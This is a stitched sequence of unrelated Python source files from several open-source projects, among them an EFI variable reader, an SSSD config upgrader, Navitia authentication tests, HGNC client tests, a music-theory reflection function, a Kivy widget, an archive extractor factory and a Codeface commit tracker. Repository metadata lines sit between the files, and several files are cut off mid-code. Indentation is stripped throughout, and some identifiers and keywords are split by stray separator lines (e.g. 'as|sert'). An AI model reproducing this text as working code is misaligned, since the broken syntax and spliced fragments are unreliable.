"""
import os.path
import platform
import re
if platform.system() == 'Windows':
import ctypes
import win32api, win32process, win32security
class EfiVariables(object):
"""Abstract EFI variable access class.
Use get_instance to create an instance for the current operating system."""
def read(self, name, guid):
raise NotImplementedError
def write(self, name, guid, value):
raise NotImplementedError
@classmethod
def get_instance(cls):
if platform.system() == 'Windows':
return WinApiEfiVariables()
elif platform.system() == 'Linux':
return SysfsEfiVariables()
else:
raise Exception("Unknown or unsupported operating system.")
class SysfsEfiVariables(EfiVariables):
"""EFI variable access for all platforms supporting /sys/firmware/efi/vars, e.g. Linux via efi_vars"""
sysfs_efi_vars_dir = '/sys/firmware/efi/vars'
@staticmethod
def read_efi_value(fname):
ret = None
try:
with open(fname, 'rb') as f:
ret = f.read()
except (IOError, OSError):
pass
return ret
def read(self, name, guid):
assert re.match(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", guid)
filename = self.sysfs_efi_vars_dir + "/%s-%s/data" % (name, guid)
if not os.path.exists(filename):
# variable not found
return None
return file(filename).read()
def available(self):
return os.path.isdir(self.sysfs_efi_vars_dir)
def __iter__(self):
if os.path.isdir(self.sysfs_efi_vars_dir):
for filename in os.listdir(self.sysfs_efi_vars_dir):
if filename == '.' or filename == '..':
continue
else:
if os.path.isdir(self.sysfs_efi_vars_dir + '/' + filename):
yield filename
else:
raise StopIteration
def __getitem__(self, key):
filename = self.sysfs_efi_vars_dir + "/%s/data" % key
if not os.path.exists(filename):
# variable not found
return None
return SysfsEfiVariables.read_efi_value(filename)
class WinApiEfiVariables(EfiVariables):
"""EFI variable access for Windows platforms"""
def __init__(self):
# enable required SeSystemEnvironmentPrivilege privilege
privilege = win32security.LookupPrivilegeValue(None, 'SeSystemEnvironmentPrivilege')
token = win32security.OpenProcessToken(win32process.GetCurrentProcess(), win32security.TOKEN_READ|win32security.TOKEN_ADJUST_PRIVILEGES)
win32security.AdjustTokenPrivileges(token, False, [(privilege, win32security.SE_PRIVILEGE_ENABLED)])
win32api.CloseHandle(token)
|
# import firmware variable API
self.GetFirmwareEnvironmentVariable = ctypes.windll.kernel32.GetFirmwareEnvironmentVariableW
self.GetFirmwareEnvironmentVariable.restype = ctypes.c_int
|
self.GetFirmwareEnvironmentVariable.argtypes = [ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_void_p, ctypes.c_int]
def read(self, name, guid):
buffer = ctypes.create_string_buffer(32768)
length = self.GetFirmwareEnvironmentVariable(name, "{%s}" % guid, buffer, 32768)
if length == 0:
# FIXME: don't always raise WinError
raise ctypes.WinError()
return buffer[:length]
def available(self):
return True if self.GetFirmwareEnvironmentVariable is not None else False
def __iter__(self):
return None
def __getitem__(self, key):
return None
|
spbnick/sssd
|
src/config/SSSDConfig/sssd_upgrade_config.py
|
Python
|
gpl-3.0
| 18,663 | 0.008359 |
#coding=utf-8
# SSSD
#
# upgrade_config.py
#
# Copyright (C) Jakub Hrozek <jhrozek@redhat.com> 2009
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
import os
import sys
import shutil
import traceback
from optparse import OptionParser
from .ipachangeconf import openLocked
from .ipachangeconf import SSSDChangeConf
class SSSDConfigFile(SSSDChangeConf):
def __init__(self, filename):
SSSDChangeConf.__init__(self)
self.filename = filename
f = openLocked(self.filename, 0o600, False)
self.opts = self.parse(f)
f.close()
def _backup_file(self, file_name):
" Copy the file we operate on to a backup location "
shutil.copy(file_name, file_name + self.backup_suffix)
# make sure we don't leak data, force permissions on the backup
os.chmod(file_name + self.backup_suffix, 0o600)
def get_version(self):
ver = self.get_option_index('sssd', 'config_file_version')[1]
if not ver:
return 1
try:
return int(ver['value'])
except ValueError:
raise SyntaxError('config_file_version not an integer')
def rename_opts(self, parent_name, rename_kw, type='option'):
for new_name, old_name in rename_kw.items():
index, item = self.get_option_index(parent_name, old_name, type)
if item:
item['name'] = new_name
def _add_dns_domain_name(self, domain):
id_provider = self.findOpts(domain['value'], 'option', 'id_provider')[1]
dns_domain_name = { 'type' : 'option',
'name' : 'dns_discovery_domain',
'value' : domain['name'].lstrip('domain/') }
if id_provider['value'] == 'ldap':
server = self.findOpts(domain['value'], 'option', 'ldap_uri')[1]
if not server or "__srv__" in server['value']:
domain['value'].insert(0, dns_domain_name)
return
elif id_provider['value'] == 'ipa':
server = self.findOpts(domain['value'], 'option', 'ipa_server')[1]
if not server or "__srv__" in server['value']:
domain['value'].insert(0, dns_domain_name)
return
auth_provider = self.findOpts(domain['value'], 'option', 'auth_provider')[1]
if auth_provider and auth_provider['value'] == 'krb5':
server = self.findOpts(domain['value'], 'option', 'krb5_server')[1]
if not server or "__srv__" in server['value']:
domain['value'].insert(0, dns_domain_name)
def _do_v2_changes(self):
# remove Data Provider
srvlist = self.get_option_index('sssd', 'services')[1]
if srvlist:
services = [ srv.strip() for srv in srvlist['value'].split(',') ]
if 'dp' in services:
services.remove('dp')
srvlist['value'] = ", ".join([srv for srv in services])
self.delete_option('section', 'dp')
for domain in [ s for s in self.sections() if s['name'].startswith("domain/") ]:
# remove magic_private_groups from all domains
self.delete_option_subtree(domain['value'], 'option', 'magic_private_groups')
# check if we need to add dns_domain
self._add_dns_domain_name(domain)
def _update_option(self, to_section_name, from_section_name, opts):
to_section = [ s for s in self.sections() if s['name'].strip() == to_section_name ]
from_section = [ s for s in self.sections() if s['name'].strip() == from_section_name ]
if len(to_section) > 0 and len(from_section) > 0:
vals = to_section[0]['value']
for o in [one_opt for one_opt in from_section[0]['value'] if one_opt['name'] in opts]:
updated = False
for v in vals:
if v['type'] == 'empty':
continue
# if already in list, just update
if o['name'] == v['name']:
o['value'] = v['value']
updated = True
# not in list, add there
if not updated:
vals.insert(0, { 'name' : o['name'], 'type' : o['type'], 'value' : o['value'] })
def _migrate_enumerate(self, domain):
" Enumerate was special as it turned into bool from (0,1,2,3) enum "
enum = self.findOpts(domain, 'option', 'enumerate')[1]
if enum:
if enum['value'].upper() not in ['TRUE', 'FALSE']:
try:
enum['value'] = int(enum['value'])
except ValueError:
raise ValueError('Cannot convert value %s in domain %s' % (enum['value'], domain['name']))
if enum['value'] == 0:
enum['value'] = 'FALSE'
elif enum['value'] > 0:
enum['value'] = 'TRUE'
else:
raise ValueError('Cannot convert value %s in domain %s' % (enum['value'], domain['name']))
def _migrate_domain(self, domain):
# rename the section
domain['name'] = domain['name'].strip().replace('domains', 'domain')
# Generic options - new:old
generic_kw = { 'min_id' : 'minId',
'max_id': 'maxId',
'timeout': 'timeout',
'magic_private_groups' : 'magicPrivateGroups',
'cache_credentials' : 'cache-credentials',
'id_provider' : 'provider',
'auth_provider' : 'auth-module',
'access_provider' : 'access-module',
'chpass_provider' : 'chpass-module',
'use_fully_qualified_names' : 'useFullyQualifiedNames',
'store_legacy_passwords' : 'store-legacy-passwords',
}
# Proxy options
proxy_kw = { 'proxy_pam_target' : 'pam-target',
'proxy_lib_name' : 'libName',
}
# LDAP options - new:old
ldap_kw = { 'ldap_uri' : 'ldapUri',
'ldap_schema' : 'ldapSchema',
'ldap_default_bind_dn' : 'defaultBindDn',
'ldap_default_authtok_type' : 'defaultAuthtokType',
'ldap_default_authtok' : 'defaultAuthtok',
'ldap_user_search_base' : 'userSearchBase',
'ldap_user_search_scope' : 'userSearchScope',
'ldap_user_search_filter' : 'userSearchFilter',
'ldap_user_object_class' : 'userObjectClass',
'ldap_user_name' : 'userName',
'ldap_user_pwd' : 'userPassword',
'ldap_user_uid_number' : 'userUidNumber',
'ldap_user_gid_number' : 'userGidNumber',
'ldap_user_gecos' : 'userGecos',
'ldap_user_home_directory' : 'userHomeDirectory',
'ldap_user_shell' : 'userShell',
'ldap_user_uuid' : 'userUUID',
|
'ldap_user_principal' : 'userPrincipal',
'ldap_force_upper_case_realm' : 'force_upper_case_realm',
'ldap_user_fullname' : 'userFullname',
'ldap_user_member_of' : 'userMemberOf',
|
'ldap_user_modify_timestamp' : 'modifyTimestamp',
'ldap_group_search_base' : 'groupSearchBase',
|
lrocheWB/navitia
|
source/jormungandr/tests/authentication_tests.py
|
Python
|
agpl-3.0
| 17,792 | 0.003147 |
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# IRC #navitia on freenode
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
import logging
from navitiacommon import models
from .tests_mechanism import AbstractTestFixture, dataset
from .check_utils import *
from contextlib import contextmanager
from flask import appcontext_pushed, g
from jormungandr import app
import json
import logging
from nose.util import *
authorizations = {
'bob': {
"main_routing_test": {'ALL': True},
"departure_board_test": {'ALL': False},
"empty_routing_test": {'ALL': False}
},
'bobette': {
#bobette cannot access anything
"main_routing_test": {'ALL': False},
"departure_board_test": {'ALL': False},
"empty_routing_test": {'ALL': False}
},
'bobitto': {
#bobitto can access all since empty_routing_test is free
"main_routing_test": {'ALL': True},
"departure_board_test": {'ALL': True},
"empty_routing_test": {'ALL': False}
},
'tgv': {
#tgv can only access main_routing_test
"main_routing_test": {'ALL': True},
"departure_board_test": {'ALL': False},
"empty_routing_test": {'ALL': False}
},
'test_user_blocked': {
"main_routing_test": {'ALL': True},
"departure_board_test": {'ALL': True},
"empty_routing_test": {'ALL': True}
},
'test_user_not_blocked': {
"main_routing_test": {'ALL': True},
"departure_board_test": {'ALL': True},
"empty_routing_test": {'ALL': True}
},
}
class FakeUser:
"""
We create a user independent from a database
"""
def __init__(self, name, id, have_access_to_free_instances=True, is_super_user=False, is_blocked=False):
"""
We just need a fake user, we don't really care about its identity
"""
self.id = id
self.login = name
self.have_access_to_free_instances = have_access_to_free_instances
self.is_super_user = is_super_user
self.end_point_id = None
self._is_blocked = is_blocked
@classmethod
def get_from_token(cls, token):
"""
Create an empty user
"""
return user_in_db[token]
def has_access(self, instance_name, api_name):
"""
This is made to avoid using of database
"""
return authorizations[self.login][instance_name][api_name]
def is_blocked(self, datetime_utc):
"""
Return True if user is blocked else False
"""
return self._is_blocked
class FakeInstance(models.Instance):
def __init__(self, name, is_free):
self.name = name
self.is_free = is_free
self.id = name
@classmethod
def get_by_name(cls, name):
return mock_instances.get(name)
user_in_db = {
'bob': FakeUser('bob', 1),
'bobette': FakeUser('bobette', 2),
'bobitto': FakeUser('bobitto', 3),
'tgv': FakeUser('tgv', 4, have_access_to_free_instances=False),
'test_user_blocked': FakeUser('test_user_blocked', 5, True, False, True),
'test_user_not_blocked': FakeUser('test_user_not_blocked', 6, True, False, False)
}
mock_instances = {
'main_routing_test': FakeInstance('main_routing_test', False),
'departure_board_test': FakeInstance('departure_board_test', False),
'empty_routing_test': FakeInstance('empty_routing_test', True),
}
@contextmanager
def user_set(app, user_name):
"""
add user
"""
def handler(sender, **kwargs):
g.user = FakeUser.get_from_token(user_name)
with appcontext_pushed.connected_to(handler, app):
yield
class AbstractTestAuthentication(AbstractTestFixture):
def setUp(self):
|
self.old_public_val = app.config['PUBLIC']
app.config['PUBLIC'] = False
|
self.app = app.test_client()
self.old_instance_getter = models.Instance.get_by_name
models.Instance.get_by_name = FakeInstance.get_by_name
def tearDown(self):
app.config['PUBLIC'] = self.old_public_val
models.Instance.get_by_name = self.old_instance_getter
@dataset({"main_routing_test": {}, "departure_board_test": {}})
class TestBasicAuthentication(AbstractTestAuthentication):
def test_coverage(self):
"""
User only has access to the first region
"""
with user_set(app, 'bob'):
response_obj = self.app.get('/v1/coverage')
response = json.loads(response_obj.data)
assert('regions' in response)
assert(len(response['regions']) == 1)
assert(response['regions'][0]['id'] == "main_routing_test")
def test_auth_required(self):
"""
if no token is given we are asked to log in (code 401) and a chalenge is sent (header WWW-Authenticate)
"""
response_obj = self.app.get('/v1/coverage')
assert response_obj.status_code == 401
assert 'WWW-Authenticate' in response_obj.headers
def test_status_code(self):
"""
We query the api with user 1 who have access to the main routintg test and not to the departure board
"""
requests_status_codes = [
('/v1/coverage/main_routing_test', 200),
('/v1/coverage/departure_board_test', 403),
# stopA and stopB and in main routing test, all is ok
('/v1/journeys?from=stopA&to=stopB&datetime=20120614T080000', 200),
# stop1 is in departure board -> KO
('/v1/journeys?from=stopA&to=stop2&datetime=20120614T080000', 403),
# stop1 and stop2 are in departure board -> KO
('/v1/journeys?from=stop1&to=stop2&datetime=20120614T080000', 403)
]
with user_set(app, 'bob'):
for request, status_code in requests_status_codes:
assert(self.app.get(request).status_code == status_code)
def test_unkown_region(self):
"""
the authentication process must not mess if the region is not found
"""
with user_set(app, 'bob'):
r, status = self.query_no_assert('/v1/coverage/the_marvelous_unknown_region/stop_areas')
assert status == 404
assert 'error' in r
assert get_not_null(r, 'error')['message'] \
== "The region the_marvelous_unknown_region doesn't exists"
@dataset({"main_routing_test": {}})
class TestIfUserIsBlocked(AbstractTestAuthentication):
def test_status_code(self):
"""
We query the api with user 5 who must be blocked
"""
requests_status_codes = [
('/v1/coverage/main_routing_test', 429),
('/v1/coverage/departure_board_test', 429)
]
with user_set(app, 'test_user_blocked'):
for request, status_code in requests_status_codes:
assert(self.app.get(request).status_code == status_code)
@dataset({"main_routing_test": {}})
class TestIfUserIsNotBlocked(AbstractTestAuthentication):
def test_status_code(self):
|
sorgerlab/belpy
|
indra/tests/test_hgnc_client.py
|
Python
|
mit
| 2,834 | 0 |
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
from indra.databases import hgnc_client
from indra.util import unicode_strs
from nose.plugins.attrib import attr
def test_get_uniprot_id():
hgnc_id = '6840'
uniprot_id = hgnc_client.get_uniprot_id(hgnc_id)
assert uniprot_id == 'Q02750'
assert unicode_strs(uniprot_id)
def test_get_uniprot_id_none():
# This HGNC entry doesn't have a UniProt ID
hgnc_id = '37187'
uniprot_id = hgnc_client.get_uniprot_id(hgnc_id)
assert uniprot_id is None, uniprot_id
def test_get_hgnc_name():
hgnc_id = '3236'
hgnc_name = hgnc_client.get_hgnc_name(hgnc_id)
assert hgnc_name == 'EGFR'
assert unicode_strs(hgnc_name)
@attr('webservice')
def test_get_hgnc_name_nonexistent():
hgnc_id = '123456'
hgnc_name = hgnc_client.get_hgnc_name(hgnc_id)
assert hgnc_name is None
as
|
sert unicode_strs(hgnc_name)
def test_entrez_hgnc():
entrez_id = '653509'
hgnc_id = hgnc_client.get_hgnc_from_entrez(entrez_id)
assert hgnc_id == '10798'
def test_entrez_hgnc_none():
entrez_id = 'xxx'
hgnc_id = hgnc_client.get_hgnc_from_entrez(entrez_id)
assert hgnc_id is None
def test_ensembl_hgnc():
ensembl_id = 'ENSG00000006071'
hgnc_id = hgnc_client.get_hgnc_from_ensembl(ensembl_id)
assert hgnc_
|
id == '59', hgnc_id
assert hgnc_client.get_ensembl_id(hgnc_id) == ensembl_id
def test_mouse_map():
hgnc_id1 = hgnc_client.get_hgnc_from_mouse('109599')
hgnc_id2 = hgnc_client.get_hgnc_from_mouse('MGI:109599')
assert hgnc_id1 == '4820'
assert hgnc_id2 == '4820'
hgnc_id = hgnc_client.get_hgnc_from_mouse('xxx')
assert hgnc_id is None
def test_rat_map():
hgnc_id1 = hgnc_client.get_hgnc_from_rat('6496784')
hgnc_id2 = hgnc_client.get_hgnc_from_rat('RGD:6496784')
assert hgnc_id1 == '44155'
assert hgnc_id2 == '44155'
hgnc_id = hgnc_client.get_hgnc_from_rat('xxx')
assert hgnc_id is None
def test_is_category():
assert hgnc_client.is_kinase('MAPK1')
assert not hgnc_client.is_kinase('EGF')
assert hgnc_client.is_phosphatase('PTEN')
assert not hgnc_client.is_phosphatase('KRAS')
assert hgnc_client.is_transcription_factor('FOXO3')
assert not hgnc_client.is_transcription_factor('AKT1')
def test_get_current_id():
# Current symbol
assert hgnc_client.get_current_hgnc_id('BRAF') == '1097'
# Outdated symbol, one ID
assert hgnc_client.get_current_hgnc_id('SEPT7') == '1717'
# Outdated symbol, multiple IDs
ids = hgnc_client.get_current_hgnc_id('HOX1')
assert len(ids) == 10
assert '5101' in ids
def test_gene_type():
assert hgnc_client.get_gene_type('1097') == 'gene with protein product'
assert hgnc_client.get_gene_type('31547') == 'RNA, micro'
|
dpazel/music_rep
|
transformation/functions/tonalfunctions/chromatic_tonal_reflection_function.py
|
Python
|
mit
| 8,810 | 0.003973 |
"""
File: chromatic_tonal_reflection_function.py
Purpose: Class defining a function that tonally reflects over a given tone.
"""
from tonalmodel.diatonic_foundation import DiatonicFoundation
from tonalmodel.tonality import Tonality
from transformation.functions.pitchfunctions.diatonic_pitch_reflection_function import FlipType
from transformation.functions.tonalfunctions.tonal_function import TonalFunction
from tonalmodel.interval import Interval
class ChromaticTonalReflectionFunction(TonalFunction):
def __init__(self, domain_tonality, cue_tone, reflect_type=FlipType.CenterTone):
"""
Constructor
:param domain_tonality: Scalar tonality being reflected
:param cue_tone: Cue tone for reflection (must be in domain tonality).
:param reflect_type: See FlipType for types of reflection.
"""
self.__domain_tonality = domain_tonality
self.__cue_tone = cue_tone
self.__reflect_type = reflect_type
if cue_tone not in domain_tonality.annotation:
raise Exception('Cue tone {0} is not in tonality {1}.'.format(cue_tone.diatonic_symbol, domain_tonality))
self.__primary_map, tonality_list = self._build_primary_map()
if len(tonality_list) == 0:
raise Exception('Tonal relfection on {0} cue {1} could not resolve range tonality.'.format(
self.domain_tonality, self.cue_tone))
# We like should do some kind of matching of domain to range, e.g. minor-type --> minor-type.from
# TODO: Explore how to improve this setting when tonality_list has more than 1 element.
self.__range_tonality = tonality_list[0]
TonalFunction.__init__(self, self.domain_tonality, self.range_tonality, self.tonal_map,
self._build_extension_map())
@property
def cue_tone(self):
return self.__cue_tone
@property
def reflect_type(self):
return self.__reflect_type
@property
def tonal_map(self):
return self.__primary_map
@property
def domain_tonality(self):
return self.__domain_tonality
@property
def range_tonality(self):
return self.__range_tonality
def _build_primary_map(self):
domain_scale = self.domain_tonality.annotation[:-1]
tonal_map = dict()
if self.reflect_type == FlipType.CenterTone:
for tone in domain_scale:
interval = Interval.calculate_tone_interval(tone, self.cue_tone)
end_tone = interval.get_end_tone(self.cue_tone)
tonal_map[tone] = end_tone
else:
if self.reflect_type == FlipType.LowerNeighborOfPair:
lower_index = domain_scale.index(self.cue_tone)
upper_index = (lower_index + 1) % len(domain_scale)
else:
upper_index = domain_scale.index(self.cue_tone)
lower_index = (upper_index - 1) % len(domain_scale)
tonal_map[domain_scale[upper_index]] = domain_scale[lower_index]
tonal_map[domain_scale[lower_index]] = domain_scale[upper_index]
last_lower = domain_scale[lower_index]
last_upper = domain_scale[upper_index]
for i in list(reversed(range(0, lower_index))):
new_lower = domain_scale[i]
interval = Interval.calculate_tone_interval(new_lower, last_lower)
new_upper = interval.get_end_tone(last_upper)
tonal_map[new_lower] = new_upper
last_lower = new_lower
last_upper = new_upper
last_lower = domain_scale[lower_index]
last_upper = domain_scale[upper_index]
for i in list(range((upper_index + 1), len(domain_scale))):
new_upper = domain_scale[i]
interval = Interval.calculate_tone_interval(last_upper, new_upper)
new_lower = interval.negation().get_end_tone(last_lower)
tonal_map[new_upper] = new_lower
last_lower = new_lower
last_upper = new_upper
range_tones = list(reversed([tonal_map[tone] for tone in domain_scale]))
first_tone = range_tones[-1]
range_tones = [first_tone] + range_tones[:-1]
# Determine the tonality of the range
range_tonality = Tonality.find_tonality(range_tones)
return tonal_map, range_tonality
def _build_extension_map(self):
ltrs = 'CDEFGAB'
extension = dict()
domain_scale = self.domain_tonality.annotation[:-1]
domain_start_index = ltrs.index(domain_scale[0].diatonic_letter)
domain_index_list = list(ltrs[domain_start_index:] + ltrs[:domain_start_index])
# One time calculations based on lower upper
if self.reflect_type != FlipType.CenterTone:
if self.reflect_type == FlipType.LowerNeighborOfPair:
lower_domain_index = domain_scale.index(self.cue_tone)
upper_domain_index = (lower_domain_index + 1) % len(domain_scale)
else:
upper_domain_index = domain_scale.index(self.cue_tone)
lower_domain_index = (upper_domain_index - 1) % len(domain_scale)
lower_tone = domain_scale[lower_domain_index]
upper_tone = domain_scale[upper_domain_index]
lower_ltr_index = domain_index_list.index(lower_tone.diatonic_letter)
lower_augmentation = lower_tone.augmentation_offset
upper_ltr_index = domain_index_list.index(upper_tone.diatonic_letter)
upper_augmentation = upper_tone.augmentation_offset
else:
lower_tone = None
upper_tone = None
lower_ltr_index = None
lower_augmentation = None
upper_ltr_index = None
upper_augmentati
|
on = None
for l in 'CDEFGAB':
for aug in ['bb', 'b', '', '#', "##"]:
tone = DiatonicFoundation.get_tone(l + aug)
|
if tone not in self.tonal_map.keys():
if self.reflect_type == FlipType.CenterTone:
interval = Interval.calculate_tone_interval(tone, self.cue_tone)
if interval: # Some intervals are illegal, eg Cbb --> C, for now ignore
end_tone = interval.get_end_tone(self.cue_tone)
extension[tone] = end_tone
else:
tone_ltr_index = domain_index_list.index(tone.diatonic_letter)
tone_augmentation = tone.augmentation_offset
if tone_ltr_index >= 0 and (tone_ltr_index < lower_ltr_index or
(tone_ltr_index == lower_ltr_index and
tone_augmentation <= lower_augmentation)):
interval = Interval.calculate_tone_interval(tone, lower_tone)
if interval:
upper = interval.get_end_tone(upper_tone)
extension[tone] = upper
elif tone_ltr_index < len(domain_index_list) and (tone_ltr_index > upper_ltr_index or
(tone_ltr_index == upper_ltr_index and
tone_augmentation >= upper_augmentation)):
interval = Interval.calculate_tone_interval(tone, upper_tone)
if interval:
new_lower = interval.get_end_tone(lower_tone)
extension[tone] = new_lower
else: # Between the two limits
upper_interval = Interval.calculate_tone_interval(tone, upper_tone)
lower_interval = Interval.calculate_tone_interval(lower_tone, tone)
if upper_interval is None and lower_interval is None:
continue
eli
|
insiderr/insiderr-app
|
app/widgets/bar.py
|
Python
|
gpl-3.0
| 1,558 | 0.000642 |
from kivy.uix.label import Label
from kivy.uix.behaviors import ButtonBehavior
from widgets.layoutint import Grid
|
LayoutInt
from kivy.uix.image import Image
from kivy.properties import StringProperty, ListProperty, ObjectProperty, NumericProperty, BooleanProperty
from kivy.compat import string_types
from kivy.factory import Factory
class BarMiddleLabel(Label):
pass
class BarMiddleImage(Image):
pass
class BarMiddleButton(ButtonBehavior, GridLayoutInt):
title = StringProperty()
class Bar(GridLayoutInt
|
):
__events__ = ('on_left_click', 'on_right_click')
screen = ObjectProperty()
color = ListProperty([1, 1, 1, 1])
left_icon = StringProperty('')
right_icon = StringProperty('')
hide_right_icon = BooleanProperty(False)
middle_cls = ObjectProperty(None, allownone=True)
middle = ObjectProperty()
shadow_height = NumericProperty(0)
def __init__(self, **kwargs):
super(Bar, self).__init__(**kwargs)
self._resolve_middle_cls()
self.bind(middle_cls=self._resolve_middle_cls)
def _resolve_middle_cls(self, *args):
if not self.middle_cls:
return
if self.middle:
self.remove_widget(self.middle)
middle_cls = self.middle_cls
if isinstance(middle_cls, string_types):
middle_cls = Factory.get(middle_cls)
self.middle = middle_cls(screen=self.screen)
self.add_widget(self.middle, 1)
def on_left_click(self, button_box):
pass
def on_right_click(self, button_box):
pass
|
Grumbel/dirtool
|
dirtools/extractor.py
|
Python
|
gpl-3.0
| 2,353 | 0.000425 |
# dirtool.py - diff tool for directories
# Copyright (C) 2018 Ingo Ruhnke <grumbel@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from PyQt5.QtCore import QObject
from abc import abstractmethod
class ExtractorResult:
SUCCESS = 0
FAILURE = 1
WORKING = 2
@staticmethod
def success(message: str = "") -> 'ExtractorResult':
return ExtractorResult(ExtractorResult.SUCCESS, message)
@staticmethod
def failure(message: str) -> 'ExtractorResult':
return ExtractorResult(ExtractorResult.FAILURE, message)
def __init__(self, status: int, message: str = "") -> None:
self.status = status
self.message = message
def __str__(self) -> str:
return "ExtractorResult({}, \"{}\")".format(self.status, self.message)
class Extractor(QObject):
def __init__(self) -> None:
super().__init__()
@property
@abstractmethod
def sig_entry_extracted(self):
pass
@property
@abstractmethod
def sig_finished(self):
pass
@abstractmethod
def extract(self) -> ExtractorResult:
pass
def interrupt(self) ->
|
None:
pass
def make
|
_extractor(filename: str, outdir: str)-> Extractor:
from dirtools.rar_extractor import RarExtractor
from dirtools.sevenzip_extractor import SevenZipExtractor
from dirtools.libarchive_extractor import LibArchiveExtractor
# FIXME: Use mime-type to decide proper extractor
if filename.lower().endswith(".rar"):
extractor = RarExtractor(filename, outdir)
elif True: # pylint: disable=using-constant-test
extractor = SevenZipExtractor(filename, outdir)
else:
extractor = LibArchiveExtractor(filename, outdir)
return extractor
# EOF #
|
selaux/numpy2vtk
|
numpy2vtk/data/raw/__init__.py
|
Python
|
lgpl-3.0
| 150 | 0 |
from raw import points
from raw import vertices
from raw import edges
from raw import polygons
__all__ = ['po
|
ints', 'vertices',
|
'edges', 'polygons']
|
bockthom/codeface
|
codeface/fileCommit.py
|
Python
|
gpl-2.0
| 7,096 | 0.002114 |
# This file is part of Codeface. Codeface is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Copyright 2013, Siemens AG, Mitchell Joblin <mitchell.joblin.ext@siemens.com>
# All Rights Reserved.
'''This class is a container to represent a commits relationship to the
other commits present in a particular file at the time of the commit.
The analysis is performed on a file by file basis. A commit can touch multiple
files however this class considers a given commit only in the context of a
single file.'''
import commit
import bisect
class FileDict:
"""
A generic dictionary for saving per-line information.
We assume that this information is available on any line,
and that the information only changes on some lines.
So we only save the information on lines that change that info
and use bisect to retrieve that information (for any line).
"""
def __init__(self, line_list, line_dict):
"""
:rtype : FileDict
"""
self.line_list = line_list
self.line_dict = line_dict
self.lastItem = line_list[-1]
def __init__(self):
"""
:rtype : FileDict
"""
self.line_list = []
self.line_dict = {}
self.lastItem = -1
def __iter__(self):
return self.line_dict.__iter__()
def get_line_info_raw(self, line_nr):
"""
Returns the info for the given line
(if the line was never set, the info for the last set line
is returned)
:param line_nr: the line to retrieve the information for.
:return: the information for the given line.
"""
i = bisect.bisect_right(self.line_list, line_nr)
info_line = self.line_list[i-1]
return self.line_dict[info_line]
def get_line_info(self, line_nr):
return set(self.get_line_info_raw(line_nr))
def add_line(self, line_nr, info):
"""
Add the given information to the current dictionary.
Note: while filling the dictionary the line_nr argument has to
be incremented (this is only to make sure the caller
gets the intended behavior)!
:param line_nr: the line number of the information
:param info: the information for the current line
"""
if line_nr < self.lastItem:
raise ValueError("can only incrementally add items")
self.line_list.append(line_nr)
# to ensure reliability for the 'bisect_right' call in the function
# 'get_line_info_raw', make sure the lines in the line_list are sorted
self.line_list.sort()
self.line_dict[line_nr] = info
def values(self):
return self.line_dict.values()
class FileCommit:
def __init__(self):
#filename under investigation
self.filename = None
#dictionary of dictionaries key is commit, value is a
#dictionary with keys=lineNumbers value=commitHash, stores
#the line number and corresponding commit hash for every
#line of the file,
self.fileSnapShots = {}
#stores the commit hash of all contributions to the file for a
#particular revision
self.revCmts = []
# dictionary with key = line number, value = function name
file_level = -1
self.functionIds = {file_level:'File_Level'}
# list of function line numbers in sorted order, this is for
# optimizing the process of finding a function Id given a line number
self.functionLineNums = [file_level]
# Function Implementation
self.functionImpl = {}
# True if start/end boundaries of artefacts are available (otherwise,
# only the start of an artefact is known
self.artefact_line_range = False
# source code element list
# stores all source code elements of interest and
# meta data
# NOTE: This does never ever seem to be used. Discuss with
# Mitchell what this was all about
self._src_elem_list = []
# dictionaries with key = line number, value = feature list|feature expression
self.feature_info = FileDict()
self.feature_expression_info = FileDict()
#Getter/Setters
def getFileSnapShots(self):
return self.fileSnapShots
def getFileSnapShot(self):
return self.fileSnapShots.values()[0]
def getFilename(self):
return self.filename
def setCommitList(self, cmtList):
self.revCmts = cmtList
def getrevCmts(self):
return self.revCmts
def getFuncImpl(self,id):
if id in self.functionImpl:
return self.functionImpl[id]
else:
return []
def setFunctionLines(self, functionIds):
self.functionIds.update(functionIds)
for id in self.functionIds.values():
self.functionImpl.update({id:[]})
self.functionLineNums.extend(sorted(self.functionIds.iterkeys()))
def setSrcElems(self, src_elem_list):
self._src_elem_list.extend(src_elem_list)
